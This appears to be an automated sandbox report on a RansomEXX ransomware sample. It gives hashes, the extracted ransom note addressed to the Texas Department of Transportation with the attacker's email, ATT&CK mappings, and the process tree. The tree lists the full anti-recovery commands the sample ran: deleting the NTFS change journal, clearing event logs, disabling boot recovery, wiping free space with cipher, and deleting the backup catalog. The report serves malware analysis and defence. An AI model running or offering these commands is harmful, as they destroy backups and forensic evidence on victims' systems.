ransomexx_win | 43fba9b9b5d580914e6a0ecb62ed0a8ab1f5d5bb5a5a8ffd8efac748837f9bb5

General

Target

480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
Size

156KB
MD5

9832040cb9c0aa58cd12d656f82420ba
SHA1

74a62abd145e9571e029db76c06c3100bfb3f4a9
SHA256

480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7
SHA512

f41ea39996bd4dd11d6df8250754612068e52e42da6c737340b0d73e71d487a2f9074ea0394957f34bb3cbc72a0cb3aa479b91a7c4177089ccdc1578a232cf49

Score

10^/10

ransomexx_win evasion ransomware

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\!TXDOT_READ_ME!.txt

Ransom Note

Greetings, Texas Department of Transportation! Read this message CAREFULLY and contact someone from IT department. Your files are securely ENCRYPTED. No third party decryption software EXISTS. MODIFICATION or RENAMING encrypted files may cause decryption failure. You can send us an encrypted file (not greater than 400KB) and we will decrypt it FOR FREE, so you have no doubts in possibility to restore all files from all affected systems ANY TIME. Encrypted file SHOULD NOT contain sensitive information (technical, backups, databases, large documents). The rest of data will be available after the PAYMENT. Infrastructure rebuild will cost you MUCH more. Contact us ONLY if you officially represent the whole affected network. The ONLY attachments we accept are non archived encrypted files for test decryption. Speak ENGLISH when contacting us. Mail us: txdot911@protonmail.com We kindly ask you not to use GMAIL, YAHOO or LIVE to contact us. The PRICE depends on how quickly you do it. �

Emails

txdot911@protonmail.com

Signatures

Deletes NTFS Change Journal 2 TTPs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
ransomware

Inhibit System Recovery
T1490

Data Destruction
T1485
RansomEXX Ransomware
Targeted ransomware with variants which affect Windows and Linux systems.
ransomware ransomexx_win
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1684 bcdedit.exe
1640 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1960 wbadmin.exe
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
1684	bcdedit.exe
1640	bcdedit.exe

pid	process
1960	wbadmin.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ExpandUnpublish.tif => C:\Users\Admin\Pictures\ExpandUnpublish.tif.txd0t	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
File renamed	C:\Users\Admin\Pictures\NewConnect.png => C:\Users\Admin\Pictures\NewConnect.png.txd0t	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
File renamed	C:\Users\Admin\Pictures\RequestCopy.png => C:\Users\Admin\Pictures\RequestCopy.png.txd0t	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
File renamed	C:\Users\Admin\Pictures\SyncRead.raw => C:\Users\Admin\Pictures\SyncRead.raw.txd0t	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe

Overwrites deleted data with Cipher tool 1 TTPs
Cipher is a Windows tool which be used to securely wipe deallocated HDD space, preventing recovery of deleted data.
ransomware

Inhibit System Recovery
T1490

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe

pid	process
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
1700	480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe

C:\Users\Admin\AppData\Local\Temp\480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe
"C:\Users\Admin\AppData\Local\Temp\480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
PID:1700

C:\Windows\System32\fsutil.exe
"C:\Windows\System32\fsutil.exe" usn deletejournal /D C:
2⤵
PID:968

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" sl Security /e:false
2⤵
PID:1972

C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1684

C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:1640

C:\Windows\SysWOW64\cipher.exe
"C:\Windows\System32\cipher.exe" /w:C:
2⤵
PID:1868

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Setup
2⤵
PID:1492

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl System
2⤵
PID:1628

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Security
2⤵
PID:1476

C:\Windows\SysWOW64\cipher.exe
"C:\Windows\System32\cipher.exe" /w:D:
2⤵
PID:1144

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Application
2⤵
PID:1316

C:\Windows\System32\wbadmin.exe
"C:\Windows\System32\wbadmin.exe" delete catalog -quiet
2⤵
- Deletes backup catalog
PID:1960

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
2⤵
PID:1968

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:324

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:612

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:904

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal on Host

1

T1070

File Deletion

1

T1107

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

5

T1490

Data Destruction

1

T1485

Replay Monitor

Loading Replay Monitor...

Downloads

memory/968-57-0x0000000000000000-mapping.dmp

Download
memory/1144-65-0x0000000000000000-mapping.dmp

Download
memory/1316-69-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp

Filesize
8KB

Download
memory/1316-61-0x0000000000000000-mapping.dmp

Download
memory/1476-67-0x0000000000000000-mapping.dmp

Download
memory/1492-66-0x0000000000000000-mapping.dmp

Download
memory/1628-68-0x0000000000000000-mapping.dmp

Download
memory/1640-62-0x0000000000000000-mapping.dmp

Download
memory/1684-63-0x0000000000000000-mapping.dmp

Download
memory/1700-55-0x00000000762D1000-0x00000000762D3000-memory.dmp

Filesize
8KB

Download
memory/1700-56-0x0000000008930000-0x00000000093EA000-memory.dmp

Filesize
10.7MB

Download
memory/1868-64-0x0000000000000000-mapping.dmp

Download
memory/1960-59-0x0000000000000000-mapping.dmp

Download
memory/1968-60-0x0000000000000000-mapping.dmp

Download
memory/1972-58-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing